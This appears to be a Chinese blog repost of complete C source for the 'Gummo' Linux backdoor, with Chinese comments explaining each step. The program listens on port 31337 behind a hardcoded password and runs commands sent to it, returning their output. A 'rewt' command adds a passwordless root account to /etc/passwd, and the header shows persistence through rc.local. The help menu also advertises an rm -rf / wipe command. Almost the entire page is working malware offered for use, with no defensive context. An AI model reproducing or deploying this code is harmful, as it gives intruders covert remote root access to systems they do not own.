linux 後門程序
阿新 • • 發佈:2018-07-15
commands fgets mil error ror out \n 處理 door
/*
/* Gummo 後門服務器
/* 編譯: cc server.c -o server
/* 使用: ./server &
/* echo /tmp/server & >> /etc/rc.d/rc.local
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#define PORT 31337
#define BACKLOG 5
#define CMD_LOG "/tmp/.cmd"
#define PASSWORD "password"
/* global */
int newfd;
void command ();
void
main ()
{
int sockfd, sin_size, ss, len, bytes;
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
char passwd[1024];
char *prompt = "Password: ";
char *gp;
//創建一個套節字
if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket");
exit (1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons (PORT);
my_addr.sin_addr.s_addr = INADDR_ANY;
bzero (&(my_addr.sin_zero), 8);
//綁定端口
if (bind (sockfd, (struct sockaddr *) &my_addr, sizeof (struct sockaddr)) == -1)
{
perror ("bind");
exit (1);
}
//接聽
if (listen (sockfd, BACKLOG) == -1)
{
perror ("listen");
exit (1);
}
while (1)
{
ss = sizeof (struct sockaddr_in);
//一直接收著 返回新的套節字
if ((newfd = accept (sockfd, (struct sockaddr *) &their_addr, &sin_size)) == -1)
{
perror ("accept");
exit (1);
}
//創建一個進程
//子進程返回0 錯誤返回-1 父進程返回 pid
if (fork ())
{
///////////////////父進程中/////////////////////////
len = strlen (prompt);
//往新的套節字裏發數據也就是往客服端發數據
bytes = send (newfd, prompt, len, 0);
//接收客服端的數據也就是密碼
recv (newfd, passwd, 1024, 0);
//判斷13首次出現位置
if ((gp = strchr (passwd, 13)) != NULL)
*(gp) = ‘\0‘;
//密碼正解
if (!strcmp (passwd, PASSWORD))
{
//繼續發給客服端
send (newfd, "準許訪問, HEH\n", 21, 0);
send (newfd, "\n\n\n\n\n\n歡迎來到Gummo後門服務器!\n\n", 41, 0);
send (newfd, "Type ‘HELP‘ for a list of commands\n\n", 36, 0);
//將處理所有發送的命令並將它們的輸出發送給客戶端
command ();
}
//密碼錯誤直接退出
else if (passwd != PASSWORD)
{
send (newfd, "Authentification Failed! =/\n", 29, 0);
close (newfd);
}
}
}
}
//處理客服端的命令
void
command ()
{
FILE *read;
FILE *append;
char cmd_dat[1024];
char *cmd_relay;
char *clean_log;
char buf[5000];
int dxm;
while (1)
{
//先發送一個提示
send (newfd, "command:~# ", 11, 0);
//等待接收
recv (newfd, cmd_dat, 1024, 0);
cmd_dat[strlen (cmd_dat) - 2] = ‘\0‘;
//判斷命令是否為空
if (strcmp (cmd_dat, ""))
{
//命令 HELP
if ((strstr (cmd_dat, "HELP")) == cmd_dat)
{
//help
send (newfd, "\n\n-=Help Menu=-\n", 16, 0);
//quit
send (newfd, "\nquit - to exit gummo backdoor\n", 31, 0);
//rewt
send (newfd, "rewt - automatically creates non passworded accnt ‘rewt‘ uid0\n", 63, 0);
//wipeout
send (newfd, "wipeout - this feature rm -rf /‘s a box. Inspired by dethcraze\n", 64, 0);
}
//quit
if ((strstr (cmd_dat, "quit")) == cmd_dat)
{
close (newfd);
}
//rewt
if ((strstr (cmd_dat, "rewt")) == cmd_dat)
{
system ("echo rewt::0:0::/:/bin/sh>>/etc/passwd;");
send (newfd, "User ‘rewt‘ added!\n", 19, 0);
}
//wipout
if ((strstr (cmd_dat, "wipeout")) == cmd_dat)
{
send (newfd, "你嘗試使用這個命令是不行的, HEH!\n", 54, 0);
close(newfd);
exit(0);
}
else
//搞一個臨時文件保存命令字符串
append = fopen (CMD_LOG, "w");
fprintf (append, "dextro\n");
fclose (append);
//用於清理日誌
clean_log = (char *) malloc (420);
sprintf (clean_log, "rm %s", CMD_LOG);
system (clean_log);
cmd_relay = (char *) malloc (1024);
//用於輸出重定向
snprintf (cmd_relay, 1024, "%s > %s;\0", cmd_dat, CMD_LOG);
system (cmd_relay);
if ((read = fopen (CMD_LOG, "r")) == NULL)
continue;
while (!(feof (read)))
{
memset (buf, 0, 500);
fgets (buf, 500, read);
if (buf[0] == 0)
break;
write (newfd, buf, 500);
}
fclose (read);
}
}
}
linux 後門程序